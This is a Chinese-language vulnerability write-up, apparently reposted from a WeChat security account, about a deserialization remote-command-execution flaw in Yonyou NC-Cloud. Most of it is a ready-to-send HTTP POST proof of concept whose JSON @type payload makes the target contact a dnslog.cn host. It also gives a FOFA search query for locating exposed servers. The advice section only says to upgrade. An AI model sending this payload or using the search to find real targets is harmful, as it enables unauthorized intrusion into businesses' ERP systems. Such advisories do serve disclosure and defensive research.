影响范围
用友NC-Cloud
漏洞概述
用友NC-Cloud是用友网络科技公司推出的一款面向中小企业的云服务产品,该产品整合了用友各类管理软件如ERP、CRM、OA等,实现了这些软件的云化部署,用友NC-Cloud存在反序列化漏洞。攻击者可以利用此漏洞执行任意命令,通过该漏洞可以获取服务器权限
漏洞复现
应用界面如下所示:
漏洞POC如下所示:
POST
/ncchr/pm/ref/indiIssued/blobRefClassSearch
HTTP/1.1
Host
: x.x.x.x
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.4103.116 Safari/537.36
Content-Type
: application/json
Content-Length
: 111
{
"clientParam"
:
"{"
x
":{"
@type
":"
java.net.InetSocketAddress
"{"
address
":,"
val
":"
0
g4idv.dnslog.cn
"}}}"
}
DNSlog回显如下:
目标检索
FOFA:
app
=
"用友-NC-Cloud"
安全建议
升级到最新版本~
原文始发于微信公众号(七芒星实验室):【护网漏洞】用友NC-Cloud 远程命令执行
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论